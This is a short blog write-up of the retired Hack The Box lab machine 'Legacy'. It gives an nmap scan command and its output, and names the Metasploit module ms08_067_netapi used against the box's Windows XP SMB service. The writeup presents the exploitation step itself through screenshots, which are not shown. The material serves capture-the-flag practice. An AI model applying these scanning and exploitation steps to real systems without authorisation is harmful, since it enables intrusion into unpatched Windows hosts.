Posted inCTF HTB Retired

Hack the box(HTB) Legacy writeup

April 10, 2020No Comments
Hack the box(HTB) legacy writeup
Hack the box(HTB) legacy writeup
Tweet
Share
Share
Pin
0 Shares
0
(0)
Hack the box(HTB) Legacy writeup

Its an easy box from hack the box which is very easy and it is more of CVE type.

Commands used

nmap -sC -sV -O -v -oA initial 10.10.10.4

msfconsole

use exploit/windows/smb/ms08_067_netapi

show options

Steps involved

Enumeration
Finding exploit
Using metasploit module to exploit it.

Enumeration

Nmap Scan

Increasing send delay for 10.10.10.4 from 0 to 5 due to 11 out of 24 dropped probes since last increase.
Nmap scan report for 10.10.10.4
Host is up (0.29s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|2008 (92%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 Server (89%), Microsoft Windows 2000 SP4 (89%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|clock-skew: mean: -4h26m25s, deviation: 2h07m15s, median: -5h56m24s | nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:69:63 (VMware) | Names: | LEGACY<00> Flags: | HTB<00> Flags: | LEGACY<20> Flags: | HTB<1e> Flags: | HTB<1d> Flags: | \x01\x02__MSBROWSE__\x02<01> Flags:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-04-09T15:53:28+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Hack the box(HTB) Legacy writeup

Anonymous login is not allowed in smb.

Finding exploit

But its have windows xp which is very old hence lets look at the exploits for it .

Hack the box(HTB) Legacy writeup

Using metasploit module to exploit.

So after many tries that exploit worked for me.

Hack the box(HTB) Legacy writeup

Getting user and root.txt

Hack the box(HTB) Legacy writeup
Hack the box(HTB) Legacy writeup

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Post Views: 120
Tags:
Last updated on November 12, 2020

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *